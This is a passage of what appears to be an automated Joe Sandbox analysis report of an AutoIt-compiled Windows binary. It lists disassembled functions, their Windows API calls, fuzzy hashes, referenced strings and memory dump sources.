                    • Instruction ID: 853b47ccdb8f174ea0e99e882e4a1a7919a515328229bb89ed9cdf7aeabf4c9d
                    • Opcode Fuzzy Hash: e42684dadb46155faa9f6b3e53598c74e2c230b86d8b03957d0c148a43bd4183
                    • Instruction Fuzzy Hash: 19E0C03154526CBADB205BA2DC0DFEF7F5CEF157A5F048029F509D5060CA75C941D7A1
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00C72231
                    • SetTextColor.GDI32(?,000000FF), ref: 00C7223B
                    • SetBkMode.GDI32(?,00000001), ref: 00C72250
                    • GetStockObject.GDI32(00000005), ref: 00C72258
                    • GetWindowDC.USER32(?,00000000), ref: 00CAC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CAC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00CAC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00CAC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00CAC132
                    • ReleaseDC.USER32(?,00000000), ref: 00CAC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: bd6cb0fed09ec2cb7eddf37f987a1e6dbef8e1dc9d98f96374efcf6dd0a3e564
                    • Instruction ID: 3d2ce3e210361437cbb3e989b7b55c2e819d70f3dfb9f256637f905bc814fdb6
                    • Opcode Fuzzy Hash: bd6cb0fed09ec2cb7eddf37f987a1e6dbef8e1dc9d98f96374efcf6dd0a3e564
                    • Instruction Fuzzy Hash: 2CE0C932604245EBDB215FA4EC497EC7B24EB16336F14C36AFA79580E187724A91DB12
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00CC8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CC882E), ref: 00CC8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CC882E), ref: 00CC8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CC882E), ref: 00CC8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: fdc80e7092e5728bdedd246139044fdd6f090cca28d6a9b9e526ce29bcfad03a
                    • Instruction ID: 39258bcb4075ade09cec82d7f108dae229375d1ebae2f681b3b77cae8e79a4a9
                    • Opcode Fuzzy Hash: fdc80e7092e5728bdedd246139044fdd6f090cca28d6a9b9e526ce29bcfad03a
                    • Instruction Fuzzy Hash: 93E04F366423119BD7205FB0AD0CF6B3BA8EF50792F18483CE245C9050DA748446CB62
                    APIs
                    • GetDesktopWindow.USER32 ref: 00CB2187
                    • GetDC.USER32(00000000), ref: 00CB2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB21B1
                    • ReleaseDC.USER32(?), ref: 00CB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: e3ad7a61bebbed1e181c75ed65e3b2fc85f1ea3ab5de0768d54fd7a4641f2360
                    • Instruction ID: 01979f492415f5edee5b5107218c94307061de01840eac2dbf2fc0ef96d0990c
                    • Opcode Fuzzy Hash: e3ad7a61bebbed1e181c75ed65e3b2fc85f1ea3ab5de0768d54fd7a4641f2360
                    • Instruction Fuzzy Hash: 23E0CAB5800204AFDB019FA1C888BAD7BB1EF48360F108429F95AE6220CB388542EF42
                    APIs
                    • GetDesktopWindow.USER32 ref: 00CB219B
                    • GetDC.USER32(00000000), ref: 00CB21A5
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CB21B1
                    • ReleaseDC.USER32(?), ref: 00CB21D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: d5af7759e340f077a67aaf077aa60b73209a75d4b5ce88c19a8470fd212651b4
                    • Instruction ID: 0074495bf1bc57b2ba8a19eb666e2833c6b4eed3d16bde3fa899bbd0bed0a1c0
                    • Opcode Fuzzy Hash: d5af7759e340f077a67aaf077aa60b73209a75d4b5ce88c19a8470fd212651b4
                    • Instruction Fuzzy Hash: B5E0CAB5800204AFCB019FA088887AD7AA1EF48320B108029F95AE6220CB389142EF42
                    APIs
                      • Part of subcall function 00CC7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00CC758C,80070057,?,?), ref: 00CC7698
                    • _memset.LIBCMT ref: 00CE9B28
                    • _memset.LIBCMT ref: 00CE9C6B
                    Strings
                    • NULL Pointer assignment, xrefs: 00CE9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _memset$lstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1020867613-2785691316
                    • Opcode ID: 51565564f83fcd2af56115d5b20266d9a9b59bb7ecce3f41090e245f49b97171
                    • Instruction ID: 9b063512aed41b5fb9dfce74df1c110e7963752180eb9a48f8d2b2f783ee7c5d
                    • Opcode Fuzzy Hash: 51565564f83fcd2af56115d5b20266d9a9b59bb7ecce3f41090e245f49b97171
                    • Instruction Fuzzy Hash: 3F913A71D00229ABDF10DFA5DC85ADEBBB8FF08710F20816AF519A7281DB705A45DFA0
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 00CCB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: 81dc4f5c63ea89ef0b062a6880cf810938fa21f5551d09c6e61aee67c0155894
                    • Instruction ID: 52b645b53650ba95d67d735dd48d0c82a0f43c0c60035fb38c7d5f3edf7c3bb7
                    • Opcode Fuzzy Hash: 81dc4f5c63ea89ef0b062a6880cf810938fa21f5551d09c6e61aee67c0155894
                    • Instruction Fuzzy Hash: 609129706006019FDB24DFA8C885F6AB7E9FF48710F24856EE959CB691DB70ED41CB60
                    APIs
                      • Part of subcall function 00C8FEC6: _wcscpy.LIBCMT ref: 00C8FEE9
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • __wcsnicmp.LIBCMT ref: 00CDB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CDB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: 5564c4e4d8d3742da6e484c2b94ecba9bb59e98bc8ca2c9bb79bf55e9834b39c
                    • Instruction ID: 301d6f7e37f398435a1d2f104607a51b0e63e50f19163dffc46991125ce3cd7b
                    • Opcode Fuzzy Hash: 5564c4e4d8d3742da6e484c2b94ecba9bb59e98bc8ca2c9bb79bf55e9834b39c
                    • Instruction Fuzzy Hash: 12618575A00215EFCB14DF94C885EAEB7F4EF48310F16815AF656AB3A1DB70AE40DB50
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00C82AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C82AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 2f9731a4a49693ffd146d8f22ebd65681e4e901302d6f4c07b10dec17fbc3bb4
                    • Instruction ID: 10ffe5c91a69e36c5bf802bd8c096b6b41f07f512934e4579d1a5ab650363888
                    • Opcode Fuzzy Hash: 2f9731a4a49693ffd146d8f22ebd65681e4e901302d6f4c07b10dec17fbc3bb4
                    • Instruction Fuzzy Hash: 44514771418744ABD320AF10D886BAFBBF8FF85314F42885DF1E9811A1DB308529DB27
                    APIs
                      • Part of subcall function 00C7506B: __fread_nolock.LIBCMT ref: 00C75089
                    • _wcscmp.LIBCMT ref: 00CD9AAE
                    • _wcscmp.LIBCMT ref: 00CD9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: ebc8b8379762eccc4f8550d10b29899c3de5ed070c731170bfce8c45e8904579
                    • Instruction ID: f9ed7fa3e9cbdf3ed65f75635b0327ee863b422214d789688d737f5cf4d91570
                    • Opcode Fuzzy Hash: ebc8b8379762eccc4f8550d10b29899c3de5ed070c731170bfce8c45e8904579
                    • Instruction Fuzzy Hash: 3741F675A00619BBDF209AA0DC85FEFBBBDDF45710F01406ABA04B72C1DBB19E0497A1
                    APIs
                    • _memset.LIBCMT ref: 00CE2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CE28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: 00d3cf248e47f71f526a8bc0741c3253cd7d07db09f63a84a38845e1331b5882
                    • Instruction ID: 745d4f7cc01e5e2a7234b2a3b252a6b30bbfa56dd923a1b1a9bb42dcd2883121
                    • Opcode Fuzzy Hash: 00d3cf248e47f71f526a8bc0741c3253cd7d07db09f63a84a38845e1331b5882
                    • Instruction Fuzzy Hash: 6F313E71800219AFCF01EFA1DC85EEEBFB9FF08310F104129F819A6166DB315A56DB61
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00CF6D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CF6DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: b81a0d2fa945a05e2dc49ea17a9eaf8aa66a62ac9255a2fce463573b76d8dc59
                    • Instruction ID: 85a9f8ac448613c13bd1b3cb306105f699c4a667dc42ad2f58c57e8adbb548b9
                    • Opcode Fuzzy Hash: b81a0d2fa945a05e2dc49ea17a9eaf8aa66a62ac9255a2fce463573b76d8dc59
                    • Instruction Fuzzy Hash: 61319071200208AADB509F34CC40BFB77B8FF48720F108519F9A987190CB71AD51DB61
                    APIs
                    • _memset.LIBCMT ref: 00CD2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CD2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 728f7374f730c466d90f594311af77c448962c01a18de0aef3a750105a98891a
                    • Instruction ID: e319ed9b6ba67afaddfac5a371c3b79e6af82574e47153ce4bc4749c012160a8
                    • Opcode Fuzzy Hash: 728f7374f730c466d90f594311af77c448962c01a18de0aef3a750105a98891a
                    • Instruction Fuzzy Hash: 8D310631600305ABEB248F48C885BAEBBB9FF15341F14442FEA95D73A1D7709B40DB50
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CF69D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CF69DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: e673459df4eb0ec1f33afcf66dd6298e75814c02000da4313b53fae9eb52afd6
                    • Instruction ID: ed9759d7ada5d41f47dc4b4f8c00105cc2824c7ad9c7dd1f9ceeccdd9738760f
                    • Opcode Fuzzy Hash: e673459df4eb0ec1f33afcf66dd6298e75814c02000da4313b53fae9eb52afd6
                    • Instruction Fuzzy Hash: 2D11B27160020C7FEF519F24DC80FBF376AEB993A4F114129FA689B290D6B19E5187A1
                    APIs
                      • Part of subcall function 00C71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C71D73
                      • Part of subcall function 00C71D35: GetStockObject.GDI32(00000011), ref: 00C71D87
                      • Part of subcall function 00C71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C71D91
                    • GetWindowRect.USER32(00000000,?), ref: 00CF6EE0
                    • GetSysColor.USER32(00000012), ref: 00CF6EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: bbf1d0542dc91ff292024fb860073f858acbe923ca8b3b34f41a5d6796f2fd8a
                    • Instruction ID: 9cc2409fc40bc3f651117359c6d0375b1eac90229db6e597c53d6c6502a98a81
                    • Opcode Fuzzy Hash: bbf1d0542dc91ff292024fb860073f858acbe923ca8b3b34f41a5d6796f2fd8a
                    • Instruction Fuzzy Hash: C8215972610209AFDB04DFA8CC45AFA7BB8FB08314F004628FE55D3250D734E861EB61
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00CF6C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CF6C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: ba3c843a4861d5a0d003db8e629d542551ee213fc4dda88ad233aa271bd5f62d
                    • Instruction ID: 4b5394df2132df32115b499d20f4185a7259a2ab01c296c6601df692b115d5f9
                    • Opcode Fuzzy Hash: ba3c843a4861d5a0d003db8e629d542551ee213fc4dda88ad233aa271bd5f62d
                    • Instruction Fuzzy Hash: 0B116A7150020CABEB508F64DC41AFA3B69EF14368F604728FAB5D71E0C775DC91AB62
                    APIs
                    • _memset.LIBCMT ref: 00CD2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CD2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 3f4db61f6dbf363ea43883736c6caab09b68ca01a7ddf08c8a9a2bd522df9269
                    • Instruction ID: c066ba081c7b27eb3a45440b0a2c9e025ffa32bbf288f34463b6cc1bdbc3f907
                    • Opcode Fuzzy Hash: 3f4db61f6dbf363ea43883736c6caab09b68ca01a7ddf08c8a9a2bd522df9269
                    • Instruction Fuzzy Hash: 1A11C831901224ABDB21DBD8DC44BAD77B9EB25310F1444BBEA64E73A0D770EE05C7A5
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CE2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CE2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: cc908c56ded0f11a9416dfa029041b71a1e5bf76b04076529e8170805d342180
                    • Instruction ID: cc1bd64a533fae5f8ed01ce565c25116e1def7d2fdb6648f74be91a721e09ba7
                    • Opcode Fuzzy Hash: cc908c56ded0f11a9416dfa029041b71a1e5bf76b04076529e8170805d342180
                    • Instruction Fuzzy Hash: AB110EB01022A5BEDB248F638C99FBBFFACFF06351F10812AF91546040D2706A81DAF0
                    APIs
                      • Part of subcall function 00CE830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00CE80C8,?,00000000,?,?), ref: 00CE8322
                    • inet_addr.WS2_32(00000000), ref: 00CE80CB
                    • htons.WS2_32(00000000), ref: 00CE8108
                    Strings
                    Memory Dump Source
